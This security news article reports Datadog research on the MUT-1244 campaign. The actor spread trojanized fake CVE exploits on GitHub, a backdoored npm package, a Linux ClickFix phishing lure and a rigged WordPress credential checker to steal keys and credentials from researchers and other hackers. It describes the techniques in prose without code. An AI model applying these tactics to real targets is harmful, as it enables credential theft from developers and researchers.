Hacker Uses Info-Stealer Against Security Pros, Other Bad Actors – Source: securityboulevard.com

An unknown hacker using two initial access techniques has compromised hundreds of victims that include not only threat hunters, pen testers, and other cybersecurity researchers but also other cybercriminals.

The bad actor, dubbed “MUT-1244” by threat researchers with Datadog Security Labs, has stolen sensitive information such as SSH private keys and Amazon Web Services (AWS) access keys from security pros as well as more than 390,000 credentials from other hackers that likely initially were bought on the dark web and seem to belong to accounts on WordPress websites.

MUT-1244 – MUT refers to “mysterious unattributed threat” – has been active since at least October and, while using multiple initial access vectors to initially compromise its targets, delivers the same second-stage payload.

The hacker’s work also appears to overlap with findings in another campaign outlined by Checkmarx researchers in a report in late November about a malicious npm package and malicious GitHub repository. Checkmarx discovered the package that started off as a legitimate XML-RPC implementation but had malicious code introduced in later versions and posed as an XML-RPC implementation to steal sensitive data every 12 hours and to mine cryptocurrency.

The npm package, which had been in the registry for more than a year starting in October 2023 and went through 16 updates, also had an associated GitHub repository, according to the Checkmarx report.

Red Teamers, Researchers are Key Targets

“Security professionals are a valuable target for threat actors, as they tend to have wide privileges and handle sensitive information,” Datadog researchers Christophe Tafani-Dereeper, Matt Muir, and Adrian Korn wrote in a report, noting reports this year by cybersecurity vendors Uptycs and SonicWall about the “opportunistic nature of these attacks, with threat actors publishing fake proof-of-concept exploit code as popular vulnerabilities get disclosed.”

MUT-1244 uses two primary initial access methods, a phishing campaign and attack tools published on GitHub that have multiple permutations, they wrote. The first method involves a phishing campaign targeting academics, the details of which the researchers found in a publicly available Git repository that contained the phishing email as a database of 2,758 target emails of academics scraped from arVix, a platform that houses research papers.

The title of the phishing message is “Notification: Important CPU Microcode Update for High-Performance Computing (HPC) Users Inbox” and asks the target to install a fake kernel upgrade. Clicking on the link sends the victim to a website, where they’re asked to copy and paste malicious code. The researchers suggested this is the first time a ClickFix – a type of social engineering attack – was documented targeting Linux systems.

If the victim copies and pastes the malicious code, a malicious script from a GitHub repository – which has since been taken down – is executed and drops the second-stage info-stealing payload that Checkmarx wrote about.

Fake POCs for Exploiting CVEs

The second initial access avenue used by MUT-1244 is a set of “malicious GitHub users publishing fake proof-of-concepts for CVEs,” Tafani-Dereeper, Muir, and Korn wrote. “We’ve observed that these dozens of users form a cluster, often starring and forking each other’s repositories. Most of them were created in October or November, have no legitimate activity, and have an AI-generated profile picture.”

Each malicious commit – some of which have been taken down – includes the name of “Robert” as the committer and includes a ProtonMail address, all of which makes it easy to link them to MUT-1244, the researchers wrote. All of the repositories drop the same second-stage payload as is dropped via the phishing campaign and the methods Checkmarx found.

Multiple Ways to Drop Payload

However, the repositories drop the payload in varying ways, such as by embedding a legitimate and likely working exploit that also includes a backdoor. The info-stealing malware also is hidden in a PDF file or dropped via a Python dropper by the bad actor copying legitimate exploit code and inserting a backdoor decoding a base64-encoded payload, then writing it to disk and executing it.

Other repositories infect the target indirectly by including the malicious npm package in the JSON package and also drops the same second-day payload by decoding an embedded base64 string, writing it to disk, and executing it. The npm package and payload contain hardcoded credentials, including a Dropbox access token and another token, both of which lets the user list and download exfiltrated files.

MUT-1244 compromises systems of dozens of victims, most of whom were red teamers, security researchers, and others who wanted to download POC exploit code, the Datadog researchers wrote, adding that it enabled the attacker to gain access to sensitive information, including private SSH keys, AWS credentials, and command history.

Stealing From the Thieves

Along the way, the bad actor accessed more than 390,000 credential that Tafani-Dereeper, Muir, and Korn believed were exfiltrated to Dropbox and stolen from other hackers who acquired them on the dark web and were then were compromised by MUT-1244 when they used malicious code in a trojanized “yawpp” GitHub project to check the validity of the credentials.

“Since MUT-1244 advertised yawpp as a ‘credentials checker’ for WordPress, it’s no surprise that an attacker with a set of stolen credentials (which are often purchased from underground markets as a way to speed up threat actor operations) would use yawpp to validate them,” Tafani-Dereeper, Muir, and Korn wrote.